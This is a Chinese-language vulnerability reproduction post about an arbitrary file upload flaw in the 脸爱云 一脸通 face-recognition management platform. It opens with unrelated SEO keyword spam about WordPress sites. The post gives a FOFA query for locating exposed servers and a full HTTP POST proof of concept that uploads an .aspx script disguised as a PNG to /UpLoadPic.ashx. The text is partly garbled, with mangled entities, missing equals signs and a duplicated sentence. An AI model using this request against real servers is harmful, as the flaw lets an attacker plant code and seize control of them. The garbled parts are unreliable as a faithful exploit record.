做食品行业网站,wordpress4.8.0,wordpress主题 mohtml,书店网站的建设漏洞描述
脸爱云一脸通智慧管理平台是一套功能强大、运行稳定、操作简单方便、用户界面美观的一脸通系统。该平台整合了人脸识别技术和智能化解决方案#xff0c;可以实现识别和管理个体身份#xff0c;为各种场景提供便捷的身份验证和管理功能。其存在任意文件上传漏洞可以实现识别和管理个体身份为各种场景提供便捷的身份验证和管理功能。其存在任意文件上传漏洞攻击者可通过此漏洞上传文件进而控制服务器。 漏洞复现
FOFA
title欢迎使用脸爱云 一脸通智慧管理平台
POC
POST /UpLoadPic.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Content-Type: multipart/form-data; boundary----WebKitFormBoundarywt7cEu1eBdibB13u
X-Requested-With: XMLHttpRequest
Content-Length: 419Connection: close
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; nameactionpost
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; namemyPhoto; filename1.aspx
Content-Type: image/png% response.write(yga) %
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; nameoldName------WebKitFormBoundarywt7cEu1eBdibB13u--
bp 访问文件查看 上传成功
